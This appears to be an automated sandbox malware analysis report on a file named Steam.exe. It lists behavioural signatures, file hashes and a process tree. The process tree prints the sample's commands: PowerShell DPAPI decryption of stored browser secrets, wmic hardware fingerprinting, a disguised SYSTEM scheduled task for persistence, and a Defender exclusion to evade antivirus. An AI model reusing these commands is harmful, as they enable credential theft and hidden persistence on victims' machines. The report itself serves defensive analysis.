Analysis

  • max time kernel
    2s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-04-2024 19:44

General

  • Target

    Steam.exe

  • Size

    154.5MB

  • MD5

    8a3861c725d108eb0c1a17fa43f0487a

  • SHA1

    e4b713028e43e0f99e4568aa3902384b52951ed2

  • SHA256

    0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef

  • SHA512

    db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad

  • SSDEEP

    1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Steam.exe
    "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4508
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3388
      • C:\Windows\system32\curl.exe
        curl http://api.ipify.org/ --ssl-no-revoke
        3⤵
          PID:4536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1604
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,50,189,46,163,143,204,242,57,124,130,127,199,217,241,213,20,38,56,175,56,52,37,95,222,179,249,84,127,57,193,28,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,137,192,49,120,208,49,5,117,80,140,220,235,39,38,191,115,173,148,172,228,133,69,61,50,109,196,44,230,130,106,62,48,0,0,0,59,204,109,24,185,235,126,93,115,15,225,227,72,95,64,231,247,155,184,14,121,29,166,79,117,132,125,44,243,197,174,66,24,226,71,34,58,216,82,0,152,163,206,212,31,7,153,215,64,0,0,0,11,31,15,241,106,179,72,246,147,176,72,177,106,139,56,202,110,163,82,178,125,177,194,142,39,175,3,106,91,22,111,132,180,62,73,234,185,254,72,51,72,15,168,3,227,153,170,224,109,39,97,125,20,214,218,204,58,75,50,110,189,234,182,171), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,50,189,46,163,143,204,242,57,124,130,127,199,217,241,213,20,38,56,175,56,52,37,95,222,179,249,84,127,57,193,28,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,137,192,49,120,208,49,5,117,80,140,220,235,39,38,191,115,173,148,172,228,133,69,61,50,109,196,44,230,130,106,62,48,0,0,0,59,204,109,24,185,235,126,93,115,15,225,227,72,95,64,231,247,155,184,14,121,29,166,79,117,132,125,44,243,197,174,66,24,226,71,34,58,216,82,0,152,163,206,212,31,7,153,215,64,0,0,0,11,31,15,241,106,179,72,246,147,176,72,177,106,139,56,202,110,163,82,178,125,177,194,142,39,175,3,106,91,22,111,132,180,62,73,234,185,254,72,51,72,15,168,3,227,153,170,224,109,39,97,125,20,214,218,204,58,75,50,110,189,234,182,171), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3152
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,197,224,143,28,165,54,72,92,246,233,32,191,24,46,105,246,181,80,82,244,98,50,113,77,39,131,70,107,20,17,18,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,232,214,33,109,10,171,34,88,45,244,211,68,213,248,113,63,204,186,57,152,167,39,14,173,231,102,13,79,123,220,0,48,0,0,0,244,7,62,86,224,27,249,160,142,173,50,211,245,131,94,250,110,91,14,170,146,113,247,253,255,250,252,147,32,58,62,71,210,115,235,233,237,24,64,161,187,109,9,21,221,186,174,22,64,0,0,0,163,34,23,217,160,123,207,120,182,62,130,149,38,16,101,148,40,131,230,239,228,34,24,160,57,101,112,128,25,35,97,186,123,245,48,119,175,155,108,52,91,185,179,137,26,89,91,37,95,12,36,179,157,222,62,201,104,125,193,181,138,54,90,149), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        PID:2680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,197,224,143,28,165,54,72,92,246,233,32,191,24,46,105,246,181,80,82,244,98,50,113,77,39,131,70,107,20,17,18,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,232,214,33,109,10,171,34,88,45,244,211,68,213,248,113,63,204,186,57,152,167,39,14,173,231,102,13,79,123,220,0,48,0,0,0,244,7,62,86,224,27,249,160,142,173,50,211,245,131,94,250,110,91,14,170,146,113,247,253,255,250,252,147,32,58,62,71,210,115,235,233,237,24,64,161,187,109,9,21,221,186,174,22,64,0,0,0,163,34,23,217,160,123,207,120,182,62,130,149,38,16,101,148,40,131,230,239,228,34,24,160,57,101,112,128,25,35,97,186,123,245,48,119,175,155,108,52,91,185,179,137,26,89,91,37,95,12,36,179,157,222,62,201,104,125,193,181,138,54,90,149), $null, 'CurrentUser')
          3⤵
            PID:4632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
          2⤵
            PID:1452
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic diskdrive get serialnumber
              3⤵
                PID:3128
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
              2⤵
                PID:3232
                • C:\Windows\system32\reg.exe
                  reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
                  3⤵
                    PID:3188
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
                  2⤵
                    PID:560
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
                      3⤵
                      • Creates scheduled task(s)
                      PID:4312
                  • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                    "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 --field-trial-handle=1976,i,10464023644433361882,5698012079200874433,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                    2⤵
                      PID:5008
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                      2⤵
                        PID:3144
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic bios get smbiosbiosversion
                          3⤵
                            PID:4912
                        • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                          "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,10464023644433361882,5698012079200874433,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                          2⤵
                            PID:3584
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
                            2⤵
                              PID:3108
                              • C:\Windows\system32\cscript.exe
                                cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
                                3⤵
                                  PID:2876
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
                                    4⤵
                                      PID:4496
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                                        5⤵
                                          PID:3928
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                    2⤵
                                      PID:1396
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic MemoryChip get /format:list
                                        3⤵
                                          PID:64
                                        • C:\Windows\system32\find.exe
                                          find /i "Speed"
                                          3⤵
                                            PID:4860
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
                                          2⤵
                                            PID:2916
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic baseboard get serialnumber
                                              3⤵
                                                PID:1100
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                                              2⤵
                                                PID:1360
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic path win32_computersystemproduct get uuid
                                                  3⤵
                                                    PID:1516
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
                                                  2⤵
                                                    PID:4792
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell wininit.exe
                                                      3⤵
                                                        PID:4152
                                                        • C:\Windows\system32\wininit.exe
                                                          "C:\Windows\system32\wininit.exe"
                                                          4⤵
                                                            PID:3024

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      f48896adf9a23882050cdff97f610a7f

                                                      SHA1

                                                      4c5a610df62834d43f470cae7e851946530e3086

                                                      SHA256

                                                      3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

                                                      SHA512

                                                      16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      c428399b96e965ae61cee1ba767fd9d9

                                                      SHA1

                                                      8964316b735c23fca792ba85354eacdd8dbb5e35

                                                      SHA256

                                                      14053c0f27a0c695462fad737c6b0c9810dce4472835977e9f08bca3ef0f7462

                                                      SHA512

                                                      5ef32b49b638dca1e5e4adf3c1823a23735c6539d06092e46bdbf97f23b2e4201455ab5e01a019167cd0c80865411ea4fb1e67cc25a3bb58989834a7a34956f7

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      255a9b37b2bd7075089f542af8618032

                                                      SHA1

                                                      1a043cfdf06b81ce7af3943ed3f32467a3cc8c11

                                                      SHA256

                                                      cc32f15284d1effcd95e4660be1d9b93559d97addc14101d4bffb14578c4d3f0

                                                      SHA512

                                                      6aefe9f3109d4ff2097cf9027da10dc22c859df04f29a3a0d5019395257a510d210fd94c8f391aa7c5012757c07d6f676ccf7eed16a2be716cc3fa00356cf9a2

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gtke0ao.tv2.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Users\Admin\AppData\Local\Temp\ef7732b5-61d9-4e21-ac03-811aceb00d8f.tmp.node

                                                      Filesize

                                                      1.8MB

                                                      MD5

                                                      3072b68e3c226aff39e6782d025f25a8

                                                      SHA1

                                                      cf559196d74fa490ac8ce192db222c9f5c5a006a

                                                      SHA256

                                                      7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

                                                      SHA512

                                                      61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

                                                    • C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      79a5e87823b83ea148f718b5fe237ec9

                                                      SHA1

                                                      408431f7d062aef5017f2ce715b2da16a8585fa8

                                                      SHA256

                                                      0626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1

                                                      SHA512

                                                      2433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8

                                                    • C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs

                                                      Filesize

                                                      155B

                                                      MD5

                                                      849a5123f73771f6fe0e36056813e7cb

                                                      SHA1

                                                      ccf4436fccf38a27cabf2603e61557976dbe3b01

                                                      SHA256

                                                      e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870

                                                      SHA512

                                                      1204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd

                                                    • memory/3152-18-0x000001C0C4C10000-0x000001C0C4C20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3152-17-0x000001C0C4C10000-0x000001C0C4C20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3152-11-0x000001C0AC780000-0x000001C0AC7A2000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/3152-23-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/3152-16-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/3152-19-0x000001C0C7150000-0x000001C0C71A0000-memory.dmp

                                                      Filesize

                                                      320KB

                                                    • memory/3928-73-0x0000020340090000-0x00000203400A0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/3928-72-0x00007FFBC9EC0000-0x00007FFBCA981000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4152-84-0x00007FFBC9EC0000-0x00007FFBCA981000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4152-85-0x000001D41C110000-0x000001D41C120000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4632-41-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4632-28-0x00000262EFDA0000-0x00000262EFDB0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4632-27-0x00000262EFDA0000-0x00000262EFDB0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4632-26-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp

                                                      Filesize

                                                      10.8MB